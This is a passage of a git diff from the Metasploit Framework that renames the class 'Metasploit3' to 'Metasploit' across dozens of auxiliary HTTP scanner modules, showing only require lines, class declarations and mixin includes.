167bb24fc9..46a7c80fbc 100644 --- a/modules/auxiliary/scanner/http/cert.rb +++ b/modules/auxiliary/scanner/http/cert.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL diff --git a/modules/auxiliary/scanner/http/chef_webui_login.rb b/modules/auxiliary/scanner/http/chef_webui_login.rb index e8abdfe8f7..53eb090887 100644 --- a/modules/auxiliary/scanner/http/chef_webui_login.rb +++ b/modules/auxiliary/scanner/http/chef_webui_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/chef_webui' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index 8fa9b4f428..290d82d5f5 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 55d0033399..289578f709 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb index de6c042743..196a3ebda8 100644 --- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb index cf49d589a8..6bcc50a9e3 100644 --- a/modules/auxiliary/scanner/http/cisco_ironport_enum.rb +++ b/modules/auxiliary/scanner/http/cisco_ironport_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb index 7f16552941..54a87a741b 100644 --- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 1f8fc7fd14..f940b9c256 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb index 166a48eba2..46f74cd374 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index 3878ced5cd..c44fcd0186 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index c7517d32f1..bd6cd325ec 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/coldfusion_version.rb b/modules/auxiliary/scanner/http/coldfusion_version.rb index b27972d810..1d1079dcda 100644 --- a/modules/auxiliary/scanner/http/coldfusion_version.rb +++ b/modules/auxiliary/scanner/http/coldfusion_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/copy_of_file.rb b/modules/auxiliary/scanner/http/copy_of_file.rb index 27d2ea545c..e35a16474a 100644 --- a/modules/auxiliary/scanner/http/copy_of_file.rb +++ b/modules/auxiliary/scanner/http/copy_of_file.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index ac9ac083f0..058b6bfc5c 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::HttpCrawler diff --git a/modules/auxiliary/scanner/http/dell_idrac.rb b/modules/auxiliary/scanner/http/dell_idrac.rb index 0bbc7ecf82..01f40c37fc 100644 --- a/modules/auxiliary/scanner/http/dell_idrac.rb +++ b/modules/auxiliary/scanner/http/dell_idrac.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/dir_listing.rb b/modules/auxiliary/scanner/http/dir_listing.rb index b759eb9fc3..6a3364ed82 100644 --- a/modules/auxiliary/scanner/http/dir_listing.rb +++ b/modules/auxiliary/scanner/http/dir_listing.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dir_scanner.rb b/modules/auxiliary/scanner/http/dir_scanner.rb index 4c2263dba7..3f24bedb35 100644 --- a/modules/auxiliary/scanner/http/dir_scanner.rb +++ b/modules/auxiliary/scanner/http/dir_scanner.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'thread' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index 36f44b069b..448fd32a6c 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb index a64f3b8a87..494e19292b 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb index 8816247bf2..e210ebbe31 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb index f2e2ad293a..f20c457475 100644 --- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb +++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb index ebf3838a7b..4ed4ced014 100644 --- a/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb +++ b/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index a121331058..18965553cb 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index 04d650de51..6e8f2ee1aa 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/ektron_cms400net.rb b/modules/auxiliary/scanner/http/ektron_cms400net.rb index 77ff86171e..acba661af1 100644 --- a/modules/auxiliary/scanner/http/ektron_cms400net.rb +++ b/modules/auxiliary/scanner/http/ektron_cms400net.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb index 58be3c1b0c..05af0bcb44 100644 --- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb +++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/enum_wayback.rb b/modules/auxiliary/scanner/http/enum_wayback.rb index d15f58d6b0..c28dc009c7 100644 --- a/modules/auxiliary/scanner/http/enum_wayback.rb +++ b/modules/auxiliary/scanner/http/enum_wayback.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index fd0a168ace..8bc9edf5b9 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index eccfdbc20d..8e8bdd68db 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb index dade96bb4f..3ecffe7521 100644 --- a/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb +++ b/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 3bb9ab7c3b..57f513e37f 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index b203939b13..b406397f96 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/files_dir.rb b/modules/auxiliary/scanner/http/files_dir.rb index ffd2f92819..175032314a 100644 --- a/modules/auxiliary/scanner/http/files_dir.rb +++ b/modules/auxiliary/scanner/http/files_dir.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index a690c8e661..a5eeda976c 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/http/git_scanner.rb b/modules/auxiliary/scanner/http/git_scanner.rb index ee027272ff..04d97af1e8 100644 --- a/modules/auxiliary/scanner/http/git_scanner.rb +++ b/modules/auxiliary/scanner/http/git_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/gitlab_login.rb b/modules/auxiliary/scanner/http/gitlab_login.rb index 46df091403..397749b25f 100644 --- a/modules/auxiliary/scanner/http/gitlab_login.rb +++ b/modules/auxiliary/scanner/http/gitlab_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/gitlab' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/gitlab_user_enum.rb b/modules/auxiliary/scanner/http/gitlab_user_enum.rb index e090a1e07c..4655decabc 100644 --- a/modules/auxiliary/scanner/http/gitlab_user_enum.rb +++ b/modules/auxiliary/scanner/http/gitlab_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'json' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index ee0000161b..47a0d04383 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/goahead_traversal.rb b/modules/auxiliary/scanner/http/goahead_traversal.rb index 2fa77e2376..d7f777cb4c 100644 --- a/modules/auxiliary/scanner/http/goahead_traversal.rb +++ b/modules/auxiliary/scanner/http/goahead_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb index 2fde2d1901..1c919d46ea 100644 --- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb +++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb index 3339ef4e3b..d235261e9e 100644 --- a/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb index 1acddfa9d5..a7319af55e 100644 --- a/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb index bb3859b313..9332e18aec 100644 --- a/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb index 81f4519f49..48edd572ab 100644 --- a/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb +++ b/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb index c4dbf3e12f..56085ccd87 100644 --- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb +++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb index 20cceac73b..d022514b57 100644 --- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb +++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/smh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/http_header.rb b/modules/auxiliary/scanner/http/http_header.rb index 0fe42d2b52..4fb02c0185 100644 --- a/modules/auxiliary/scanner/http/http_header.rb +++ b/modules/auxiliary/scanner/http/http_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_hsts.rb b/modules/auxiliary/scanner/http/http_hsts.rb index 06b6126bad..6820415d23 100644 --- a/modules/auxiliary/scanner/http/http_hsts.rb +++ b/modules/auxiliary/scanner/http/http_hsts.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index de43931a43..58b83f281c 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/http' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index 51774421c0..9c98351055 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/http_version.rb b/modules/auxiliary/scanner/http/http_version.rb index 10ac45f37a..826f3589d9 100644 --- a/modules/auxiliary/scanner/http/http_version.rb +++ b/modules/auxiliary/scanner/http/http_version.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/httpbl_lookup.rb b/modules/auxiliary/scanner/http/httpbl_lookup.rb index 3fdc6c3755..43efcba534 100644 --- a/modules/auxiliary/scanner/http/httpbl_lookup.rb +++ b/modules/auxiliary/scanner/http/httpbl_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require "net/dns/resolver" -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/iis_internal_ip.rb b/modules/auxiliary/scanner/http/iis_internal_ip.rb index ab597f3bc7..7c370e3682 100644 --- a/modules/auxiliary/scanner/http/iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/influxdb_enum.rb b/modules/auxiliary/scanner/http/influxdb_enum.rb index a4b17dcea8..5de58a71c0 100644 --- a/modules/auxiliary/scanner/http/influxdb_enum.rb +++ b/modules/auxiliary/scanner/http/influxdb_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/infovista_enum.rb b/modules/auxiliary/scanner/http/infovista_enum.rb index 293613c0c2..99873f6276 100644 --- a/modules/auxiliary/scanner/http/infovista_enum.rb +++ b/modules/auxiliary/scanner/http/infovista_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/ipboard_login.rb b/modules/auxiliary/scanner/http/ipboard_login.rb index 2e32e763ef..31c207f6ed 100644 --- a/modules/auxiliary/scanner/http/ipboard_login.rb +++ b/modules/auxiliary/scanner/http/ipboard_login.rb @@ -3,7 +3,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/ipboard' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_status.rb b/modules/auxiliary/scanner/http/jboss_status.rb index 871adfedaa..cae4efc341 100644 --- a/modules/auxiliary/scanner/http/jboss_status.rb +++ b/modules/auxiliary/scanner/http/jboss_status.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index 7c6e5758ab..0d0f83991b 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/jenkins_command.rb b/modules/auxiliary/scanner/http/jenkins_command.rb index 87c640e6be..8882bd2bef 100644 --- a/modules/auxiliary/scanner/http/jenkins_command.rb +++ b/modules/auxiliary/scanner/http/jenkins_command.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'cgi' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 88db19fbe7..be1e7c14ad 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb @@ -11,7 +11,7 @@ require 'rex/proto/http' require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/jenkins_login.rb 